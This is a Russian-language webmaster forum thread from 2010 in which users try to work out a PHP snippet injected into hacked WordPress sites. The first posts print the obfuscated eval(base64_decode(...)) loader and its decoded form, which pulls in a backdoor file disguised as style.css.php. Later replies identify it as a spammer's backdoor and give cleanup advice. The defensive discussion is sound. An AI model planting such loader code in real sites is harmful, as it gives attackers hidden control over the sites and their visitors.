Z
С нами с 15.05.05
Сообщения: 55219
Рейтинг: 7770
|
Добавлено: 04/07/10 в 10:36 |
сабж хакнули и повесили на всех php страницах код
Код: [развернуть] | <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL21ucm9tYW4vbWVzc2luYXNzYW5hbHJhcGUuY29tL2Nuc3RhdHMvbWFudWFsL2VuZ2xpc2gvaW1nL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?> |
что эта мудянка делает ?
|
|
|
|
С нами с 24.10.04
Сообщения: 18881
Рейтинг: 9010
|
Добавлено: 04/07/10 в 10:39 |
Код: [развернуть] | if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/mnroman/messinassanalrape.com/cnstats/manual/english/img/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}} |
|
|
|
|
Z
С нами с 15.05.05
Сообщения: 55219
Рейтинг: 7770
|
Добавлено: 04/07/10 в 11:00 |
ibiz: спасибо
но не понятно что она делает то ?
совсем плохо или не очень?
|
|
|
|
С нами с 24.10.04
Сообщения: 18881
Рейтинг: 9010
|
Добавлено: 04/07/10 в 11:22 |
ничего плохого эти строки не делают, подключают какой-то файл, а вот этот какой-то файл хуй знает что делает
|
|
|
|
Z
С нами с 15.05.05
Сообщения: 55219
Рейтинг: 7770
|
Добавлено: 04/07/10 в 11:41 |
бля не влазиет код из файла который подгружается
|
|
|
|
С нами с 24.10.04
Сообщения: 18881
Рейтинг: 9010
|
Добавлено: 04/07/10 в 11:53 |
удаляй нахер это
там обфускация кода, лень разбираться что конкретно он делает
|
|
|
|
С нами с 23.03.03
Сообщения: 390
Рейтинг: 254
|
Добавлено: 04/07/10 в 12:39 |
в подключаемом файле бекдор
дорвейщеги балуются
он может на тебе доров поднимать
чисти все пхп файлы от кодеса этого, обновляй двигло, устанавливай правильные права типа 755 на файлы и папки
|
|
|
|
С нами с 22.03.09
Сообщения: 7753
Рейтинг: 6329
|
Добавлено: 04/07/10 в 14:47 |
Стукни в будни с защитой помогу, для взлома WP всего два варианта, их просто отсечь. А в бане гугла его оставить вообще в два счета.
Суки!!! Не умеют жить нормально.
|
|
|
|
Z
С нами с 15.05.05
Сообщения: 55219
Рейтинг: 7770
|
Добавлено: 04/07/10 в 19:54 |
всем спасибо!
разобрался, взломали видимо из-за старой версии WP, блоги кстати не мои
|
|
|
|
С нами с 22.03.09
Сообщения: 7753
Рейтинг: 6329
|
Добавлено: 04/07/10 в 21:36 |
andreich писал: | всем спасибо!
разобрался, взломали видимо из-за старой версии WP, блоги кстати не мои |
это тут ни при чем
|
|
|
|
programmer
С нами с 08.12.02
Сообщения: 7615
Рейтинг: 5760
|
Добавлено: 04/07/10 в 21:48 |
шелл висящий на серваке пару лет, легко допишет 3 причину взлома
среди нас знаток? поведай миру, епт
|
|
|
|
Z
С нами с 15.05.05
Сообщения: 55219
Рейтинг: 7770
|
Добавлено: 04/07/10 в 22:11 |
Хм на этом апаче висит с пару десятков WP, взломали только эти, на других версии другие, я в сетаки склоняюсь к тому что из-за версии WP произошел взлом
|
|
|
|
Добрых Дел Мастер
С нами с 03.05.08
Сообщения: 3143
Рейтинг: 1227
|
Добавлено: 04/07/10 в 22:13 |
а нинада на хостах держать php-блоги . блоги должны лежать на твоем личном закрытом от http девелоп-хосте и на домены должны заливаться только чистые html-страницы
|
|
|
|
Z
С нами с 15.05.05
Сообщения: 55219
Рейтинг: 7770
|
Добавлено: 04/07/10 в 22:25 |
FXIX: ну не все такие умные как ты
|
|
|
|
С нами с 23.03.03
Сообщения: 390
Рейтинг: 254
|
Добавлено: 05/07/10 в 10:41 |
semen_ssr фигню говоришь, старые версии более уязвимы, особенно пот автоматические атаки
и софт этот работает в определенных пределах. изучал его с полгода назад.
|
|
|
|